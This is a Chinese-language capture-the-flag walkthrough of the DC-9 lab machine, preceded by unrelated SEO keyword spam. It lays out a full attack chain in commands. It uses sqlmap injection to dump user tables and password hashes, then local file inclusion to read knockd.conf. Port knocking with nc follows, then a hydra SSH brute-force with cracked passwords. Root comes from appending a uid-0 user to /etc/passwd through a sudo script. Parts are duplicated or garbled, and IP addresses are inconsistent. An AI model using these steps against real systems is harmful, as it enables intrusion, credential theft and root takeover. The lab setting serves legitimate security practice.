南京的电商网站设计,网站广告投放收费标准,新泰网站设计,嘉定网站建设哪里好一、搭建环境
kali的IP地址是#xff1a;192.168.200.14
DC-9的IP地址暂时未知
二、信息收集
1、探索同网段下存活的主机
arp-scan -l #2、探索开放的端口 开启端口有#xff1a;80和22端口
3、目录扫描 访问80 端口显示的主页面 分别点击其他几个页面
可以看到是用户…一、搭建环境
kali的IP地址是192.168.200.14
DC-9的IP地址暂时未知
二、信息收集
1、探索同网段下存活的主机
arp-scan -l #2、探索开放的端口 开启端口有80和22端口
3、目录扫描 访问80 端口显示的主页面 分别点击其他几个页面
可以看到是用户的信息 此页面下出现的搜索框。可能会存在xss漏洞和SQL注入漏洞 最后一个需要正确输入用户名和密码才可以登录 输入什么都会跳转这个页面 用抓包的形式进行尝试点击进行抓包测试
三、漏洞探测
sql注入
运用工具SQLMAP 将捕获的数据要包放到sqlmap的安装目录下创建一个新的文件 在cmd命令行上输入以下指令
1、获得数据库
python sqlmap.py -r 1.txt --dbs --batch # 第一种方法
python sqlmap.py -u http://192.168.200.6/results.php --data search1 --dbs 第二种方法2、获取数据表
python sqlmap.py -r 1.txt -D Staff --tables # 第一种方法
python sqlmap.py -u http://192.168.200.6/results.php --data search1 -D Staff --tables
# 第二种方法3、爆字段
sqlmap.py -r 1.txt -D Staff -T Users --columns # 第一种方法python sqlmap.py -u http://192.168.200.6/results.php --data search1 -D Staff -T Users --columns
# 第二种方法4、暴内容
python sqlmap -u http://192.168.200.6/results.php --data search1 -D Staff -T Users --dump
# 第一种方法
python sqlmap.py -r 1.txt -D Staff -T Users --dump # 第二种方法----------------------------------------------------
| UserID | Username | Password |
----------------------------------------------------
| 1 | admin | 856f5de590ef37314e7c3bdf6f8a66dc |
----------------------------------------------------经过md5加密的admin用户密码在线md5解码一下
账号admin
密码transorbital1登录成功 爆破另外一个数据库Users只是用使用一种方法
1、爆破数据库
python sqlmap.py -r 1.txt --dbs --batch2、获取数据库
python sqlmap.py -r 1.txt -D Users --tables3、爆破字段
python sqlmap.py -r 1.txt -D users -T UserDetails --columns4、爆破内容
python sqlmap.py -r 1.txt -D users -T UserDetails --dumppython sqlmap -r 1.txt -D users -T UserDetails -C username,password --dump回到原网页
文件包含
根据底部的信息File does not exist可以推断有可能存在文件包含漏洞 选择manage.php进行尝试文件包含漏洞成功经过百度可以知道有个敲门打开SSH端口的事情 端口保护之端口敲门
大致就是按一定的顺序访问端口可以达到开启和关闭某个端口的机制
通过查看…/…/…/…/etc/knockd.conf文件结合搜索到的相关知识知道用nc分别去尝试这三个端口可以打开SSH端口
通过查看../../../../etc/knockd.conf文件结合搜索到的相关知识
知道用nc分别去尝试这三个端口可以打开SSH端口经过百度进行敲门
nc 192.168.200.6 7469
nc 192.168.200.6 8475
nc 192.168.200.6 9842
nmap再次扫描一下发现22端口开放了amazing!!! 使用之前得到的用户名和密码去爆破ssh服务
hydra -L username.txt -P password.txt ssh://192.168.200.6 Hydra v9.1 (c) 2020 by van Hauser/THC David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-31 04:04:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://10.0.0.28:22/
[22][ssh] host: 192.168.200.6 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.200.6 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.200.6 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found三个用户家目录下什么也没有
按顺序先选择fredf登录B4-Tru3-001
ssh fredf192.168.200.6
查看sudo -l成功 选择chandlerb登录UrAG0D!
ssh chandlerb192.168.200.6
查看sudo -l失败 选择joeyt登录Passw0rd
ssh joeyt192.168.200.6
查看sudo -l失败 选择janitor登录Ilovepeepee
ssh janitor192.168.200.6
查看sudo -l失败 使用janitor登陆发现了一个密码文件,使用janitor登陆发现了一个密码文件
janitordc-9:~$ ls -al
total 20
drwx------ 4 janitor janitor 4096 Aug 31 18:38 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history - /dev/null
drwx------ 3 janitor janitor 4096 Aug 31 18:05 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
-rw-r--r-- 1 janitor janitor 6 Aug 31 18:42 test.txt
janitordc-9:~$ cd .secrets-for-putin/
janitordc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitordc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts[22][ssh] host: 192.168.200.6 login: fredf password: B4-Tru3-001经过四个账户的查询发现只有fredf有一定权限
cd /opt/devstuff/dist/test/
ls -al可以发现他具有一个特殊权限可以运行一个test脚本。
fredfdc-9:~$ /opt/devstuff/dist/test/test --help
Usage: python test.py read append
fredfdc-9:~$
# 这个test的作用就是把一个文件中的内容append到另一个文件中。
我们首先想到利用test往passwd文件中写入用户信息便这个用户口令必须是加密过的。提权
在janitor中发现了几个密码加到我们的密码字典中
然后再次使用hydra爆破发现了第四个可以用ssh登录的账号和密码
登录后sudo -l发现test文件有root权限 切换到test目录看下找下这个test.py在/opt/devstuff目录下脚本的作用就是将第一个文件的内容附加到另一个文件里面去 在etc/passwd文件里进行写入账号密码
运行脚本的时候最好切换到test目录下test.py的路径为绝对路径
openssl passwd -1 -salt dc 123456
echo dc:$1$dc$5uDk4oYnRiBs0fFGlcRwy.:0:0:root:/bin/bash /tmp/dc
sudo ./test /tmp/dc /etc/passwd3.按照/etc/passwd的格式写一个文件通过test脚本追加到/etc/passwd中即可提权,运行脚本的时候最好切换到test目录下test.py的路径为绝对路径
